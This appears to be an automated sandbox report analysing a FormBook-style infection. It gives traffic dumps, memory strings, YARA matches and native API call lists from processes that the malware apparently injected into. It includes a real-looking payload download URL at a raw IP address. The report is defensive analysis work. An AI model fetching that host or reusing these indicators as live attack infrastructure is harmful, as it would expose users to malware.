8b a7 f7 3c 49 86 da 04 3e ee f7 fb c1 61 90 19 db c0 35 42 f6 cd 8b d7 d4 14 3a 39 3e b3 04 fc fa 37 de f1 78 1c 1c 8c 37 0e 7a 59 d7 82 1a 6d 31 98 54 dd ad 9b 58 10 f1 dc c1 70 03 0d 39 3d f4 4a e4 8e cc 85 71 e2 5a f0 62 e2 98 a9 4e 60 3f 09 e3 3d d4 7d 3d c1 26 fc 8f 36 cf 48 2e 4b dc fd 8b e2 36 67 a3 ed db 48 75 2a 7e 17 89 2f 7b b1 80 56 28 a9 15 43 09 96 2c ce 40 69 38 6d 56 1a 8e 1b 9f 76 93 df 2f 9d d2 57 90 46 38 97 f9 f3 58 fb fd 12 2e 43 dd b0 f8 e7 3f 00 00 00 ff ff 0d 0a Data Ascii: 1ed|S0]sBs7iM@]-s`%7i4`$YGGRA{Pqm/pxiB_</J9/\|!+jZAeZq)jAo|m5ka',Fk6x>DAbU.>y^-RSo6B)m8w*ln}w*eQ?dCvmsv1-PElCL]@3.==0V05@`ow]1ZO/RVZ3\M4<I>a5B:9>7x7zYm1TXp9=JqZbN`?=}=&6H.K6gHu*~/{V(C,@i8mVv/WF8X.C?
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 24 Apr 2024 09:58:55 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=6mqhCtYPhcKQolffdsxmhPbRVJaIKjXqt6QNl2nfZpoLlD3eGaDWhLygLclMHX0j0rdKRbH65GREoodHcUVyIjeJIodHYTOg8rW%2BExA7WilKJRAG37fMoMOi%2Fo9zw89zYrDjxA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 87953cd219a52f7c-LAXalt-svc: h3=":443"; ma=86400Data Raw: 34 34 38 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 09 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 09 09 09 09 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 09 09 09 09 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 32 25 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 09 09 09 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 6c 6f 67 6f 20 69 6d 67 20 2b 20 69 6d 67 20 7b 0a 09 09 09 20 20 20 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 31 32 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 74 69 74 6c 65 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 32 34 70 78 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 31 30 70 78 3b 0a 09 09 09 09 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0a 09 09 09 09 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 31 30 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 64 65 73 Data Ascii: 448<!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22DA6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A24460000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.20347450981.0000025A233DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Licences.ttf
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.105.163/Licences.ttfpNBl
Source: powershell.exe, 00000006.00000002.20347450981.0000025A244BA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://87.121.H
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXz
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXz
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 0000000A.00000002.20247080329.000000006A5B2000.00000020.00000001.01000000.0000000D.sdmp String found in binary or memory: http://www.xmlspy.com)
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22971000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004E71000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20092124595.00000000078B3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 0000000A.00000002.20084185803.0000000004FCA000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester4
Source: powershell.exe, 00000006.00000002.20347450981.0000025A22B9E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/PesterXz
Source: powershell.exe, 00000006.00000002.20347450981.0000025A23607000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://go.micro
Source: powershell.exe, 00000006.00000002.20453370877.0000025A329E1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000005EDB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.20088814752.0000000006018000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000006.00000002.20473581969.0000025A3AAD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ocsp.quovadisoffshore.com0

E-Banking Fraud
barindex
Yara detected FormBook
Source: Yara match File source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: amsi32_2316.amsi.csv, type: OTHER Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: 00000010.00000002.21017259081.0000000001340000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21015350999.0000000002AA0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21018295685.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000F.00000002.21017838349.0000000003060000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.20312027456.0000000003040000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 3124, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 2316, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Very long command line found
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2814
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2838
Source: C:\Windows\System32\cmd.exe Process created: Commandline size = 2814 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: Commandline size = 2838 Jump to behavior
Contains functionality to call native functions
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233334E0 NtCreateMutant,LdrInitializeThunk, 12_2_233334E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B90 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_23332B90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332BC0 NtQueryInformationToken,LdrInitializeThunk, 12_2_23332BC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332A80 NtClose,LdrInitializeThunk, 12_2_23332A80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332EB0 NtProtectVirtualMemory,LdrInitializeThunk, 12_2_23332EB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332D10 NtQuerySystemInformation,LdrInitializeThunk, 12_2_23332D10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23334260 NtSetContextThread, 12_2_23334260
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23334570 NtSuspendThread, 12_2_23334570
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B20 NtQueryInformationProcess, 12_2_23332B20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B10 NtAllocateVirtualMemory, 12_2_23332B10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B00 NtQueryValueKey, 12_2_23332B00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332B80 NtCreateKey, 12_2_23332B80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332BE0 NtQueryVirtualMemory, 12_2_23332BE0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332A10 NtWriteFile, 12_2_23332A10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332AA0 NtQueryInformationFile, 12_2_23332AA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332AC0 NtEnumerateValueKey, 12_2_23332AC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233329F0 NtReadFile, 12_2_233329F0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233329D0 NtWaitForSingleObject, 12_2_233329D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233338D0 NtGetContextThread, 12_2_233338D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332F30 NtOpenDirectoryObject, 12_2_23332F30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332F00 NtCreateFile, 12_2_23332F00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332FB0 NtSetValueKey, 12_2_23332FB0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E00 NtQueueApcThread, 12_2_23332E00
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E50 NtCreateSection, 12_2_23332E50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332E80 NtCreateProcessEx, 12_2_23332E80
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332ED0 NtResumeThread, 12_2_23332ED0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332EC0 NtQuerySection, 12_2_23332EC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332D50 NtWriteVirtualMemory, 12_2_23332D50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332DA0 NtReadVirtualMemory, 12_2_23332DA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332DC0 NtAdjustPrivilegesToken, 12_2_23332DC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23333C30 NtOpenProcessToken, 12_2_23333C30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C30 NtMapViewOfSection, 12_2_23332C30
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C20 NtSetInformationFile, 12_2_23332C20
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C10 NtOpenProcess, 12_2_23332C10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332C50 NtUnmapViewOfSection, 12_2_23332C50
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23333C90 NtOpenThread, 12_2_23333C90
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332CF0 NtDelayExecution, 12_2_23332CF0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23332CD0 NtEnumerateKey, 12_2_23332CD0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E642B0 SleepEx,NtResumeThread, 14_2_06E642B0
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe Code function: 14_2_06E64108 SleepEx,NtCreateSection, 14_2_06E64108
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE34E0 NtCreateMutant,LdrInitializeThunk, 15_2_04AE34E0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE4570 NtSuspendThread,LdrInitializeThunk, 15_2_04AE4570
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE4260 NtSetContextThread,LdrInitializeThunk, 15_2_04AE4260
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2CF0 NtDelayExecution,LdrInitializeThunk, 15_2_04AE2CF0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C30 NtMapViewOfSection,LdrInitializeThunk, 15_2_04AE2C30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C50 NtUnmapViewOfSection,LdrInitializeThunk, 15_2_04AE2C50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2DA0 NtReadVirtualMemory,LdrInitializeThunk, 15_2_04AE2DA0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2D10 NtQuerySystemInformation,LdrInitializeThunk, 15_2_04AE2D10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2ED0 NtResumeThread,LdrInitializeThunk, 15_2_04AE2ED0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E00 NtQueueApcThread,LdrInitializeThunk, 15_2_04AE2E00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E50 NtCreateSection,LdrInitializeThunk, 15_2_04AE2E50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2FB0 NtSetValueKey,LdrInitializeThunk, 15_2_04AE2FB0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2F00 NtCreateFile,LdrInitializeThunk, 15_2_04AE2F00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE38D0 NtGetContextThread,LdrInitializeThunk, 15_2_04AE38D0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE29F0 NtReadFile,LdrInitializeThunk, 15_2_04AE29F0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2A80 NtClose,LdrInitializeThunk, 15_2_04AE2A80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2AC0 NtEnumerateValueKey,LdrInitializeThunk, 15_2_04AE2AC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2A10 NtWriteFile,LdrInitializeThunk, 15_2_04AE2A10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B80 NtCreateKey,LdrInitializeThunk, 15_2_04AE2B80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B90 NtFreeVirtualMemory,LdrInitializeThunk, 15_2_04AE2B90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2BC0 NtQueryInformationToken,LdrInitializeThunk, 15_2_04AE2BC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B00 NtQueryValueKey,LdrInitializeThunk, 15_2_04AE2B00
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B10 NtAllocateVirtualMemory,LdrInitializeThunk, 15_2_04AE2B10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE3C90 NtOpenThread, 15_2_04AE3C90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2CD0 NtEnumerateKey, 15_2_04AE2CD0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C20 NtSetInformationFile, 15_2_04AE2C20
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE3C30 NtOpenProcessToken, 15_2_04AE3C30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2C10 NtOpenProcess, 15_2_04AE2C10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2DC0 NtAdjustPrivilegesToken, 15_2_04AE2DC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2D50 NtWriteVirtualMemory, 15_2_04AE2D50
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2EB0 NtProtectVirtualMemory, 15_2_04AE2EB0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2E80 NtCreateProcessEx, 15_2_04AE2E80
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2EC0 NtQuerySection, 15_2_04AE2EC0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2F30 NtOpenDirectoryObject, 15_2_04AE2F30
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE29D0 NtWaitForSingleObject, 15_2_04AE29D0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2AA0 NtQueryInformationFile, 15_2_04AE2AA0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2BE0 NtQueryVirtualMemory, 15_2_04AE2BE0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_04AE2B20 NtQueryInformationProcess, 15_2_04AE2B20
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8AD0 NtReadFile, 15_2_02AC8AD0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8B90 NtDeleteFile, 15_2_02AC8B90
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC89A0 NtCreateFile, 15_2_02AC89A0
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8C10 NtClose, 15_2_02AC8C10
Source: C:\Windows\SysWOW64\AtBroker.exe Code function: 15_2_02AC8D50 NtAllocateVirtualMemory, 15_2_02AC8D50
Detected potential crypto function
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFB2008B1A6 6_2_00007FFB2008B1A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 6_2_00007FFB2008BF52 6_2_00007FFB2008BF52
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C58670 10_2_04C58670
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C58F40 10_2_04C58F40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C51CEF 10_2_04C51CEF
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C51D7A 10_2_04C51D7A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C5B77A 10_2_04C5B77A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_04C58328 10_2_04C58328
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BF330 12_2_233BF330
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330E310 12_2_2330E310
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F1380 12_2_232F1380
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C2245 12_2_232C2245
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232ED2EC 12_2_232ED2EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D130 12_2_2339D130
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233C010E 12_2_233C010E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232EF113 12_2_232EF113
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2334717A 12_2_2334717A
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331B1E0 12_2_2331B1E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233051C0 12_2_233051C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AE076 12_2_233AE076
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232F00A0 12_2_232F00A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B70F1 12_2_233B70F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330B0D0 12_2_2330B0D0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23302760 12_2_23302760
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2330A760 12_2_2330A760
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B6757 12_2_233B6757
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2339D62C 12_2_2339D62C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331C600 12_2_2331C600
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23324670 12_2_23324670
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233AD646 12_2_233AD646
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300680 12_2_23300680
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BF6F6 12_2_233BF6F6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FC6E0 12_2_232FC6E0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233736EC 12_2_233736EC
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BA6C0 12_2_233BA6C0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233CA526 12_2_233CA526
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BF5C9 12_2_233BF5C9
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233B75C6 12_2_233B75C6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300445 12_2_23300445
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BFB2E 12_2_233BFB2E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23300B10 12_2_23300B10
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_23374BC0 12_2_23374BC0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BCA13 12_2_233BCA13
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BEA5B 12_2_233BEA5B
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_2331FAA0 12_2_2331FAA0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BFA89 12_2_233BFA89
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232FE9A0 12_2_232FE9A0
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233BE9A6 12_2_233BE9A6
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_232C99E8 12_2_232C99E8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_233A0835 12_2_233A0835
